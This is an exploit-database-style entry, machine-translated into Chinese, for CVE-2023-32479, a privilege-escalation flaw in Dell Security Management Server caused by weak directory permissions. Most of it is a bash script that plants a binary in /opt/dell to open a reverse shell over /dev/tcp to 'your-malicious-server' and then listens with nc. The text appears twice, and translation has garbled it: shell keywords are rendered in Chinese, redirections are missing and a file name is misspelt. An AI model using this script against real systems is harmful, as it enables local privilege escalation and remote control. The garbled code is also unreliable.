#利用title: [title] dell Security Management Server版本
11.9.0
#利用作者: [作者] Amirhossein Bahramizadeh
#CVE : [如果适用] CVE-2023-32479
Dell加密,Dell Endpoint Security Suite Enterprise和Dell Security
管理
11.9.0之前的服务器版本包含特权升级漏洞
由于非默认安装目录的不当ACL。本地
恶意用户可能会通过更换来利用这种漏洞
安装目录中的二进制文件并取下系统的反向外壳
导致特权升级。
#!/bin/bash
install_dir='/opt/dell'
#检查已安装的目录是否不正确
如果[-w'$ install_dir'];然后
#用破坏反向外壳的恶意二进制替换安装目录中的二进制文件
回声'#!/bin/bash''$ install_dir/dell-expoit'
echo'bash -i/dev/tcp/your-malicious-server/1234 01'$ install_dir/dell-exploit'
chmod +x'$ install_dir/dell-exploit'
#等待反向外壳连接到您的恶意服务器
NC -LVNP 1234
fi
11.9.0
#利用作者: [作者] Amirhossein Bahramizadeh
#CVE : [如果适用] CVE-2023-32479
Dell加密,Dell Endpoint Security Suite Enterprise和Dell Security
管理
11.9.0之前的服务器版本包含特权升级漏洞
由于非默认安装目录的不当ACL。本地
恶意用户可能会通过更换来利用这种漏洞
安装目录中的二进制文件并取下系统的反向外壳
导致特权升级。
#!/bin/bash
install_dir='/opt/dell'
#检查已安装的目录是否不正确
如果[-w'$ install_dir'];然后
#用破坏反向外壳的恶意二进制替换安装目录中的二进制文件
回声'#!/bin/bash''$ install_dir/dell-expoit'
echo'bash -i/dev/tcp/your-malicious-server/1234 01'$ install_dir/dell-exploit'
chmod +x'$ install_dir/dell-exploit'
#等待反向外壳连接到您的恶意服务器
NC -LVNP 1234
fi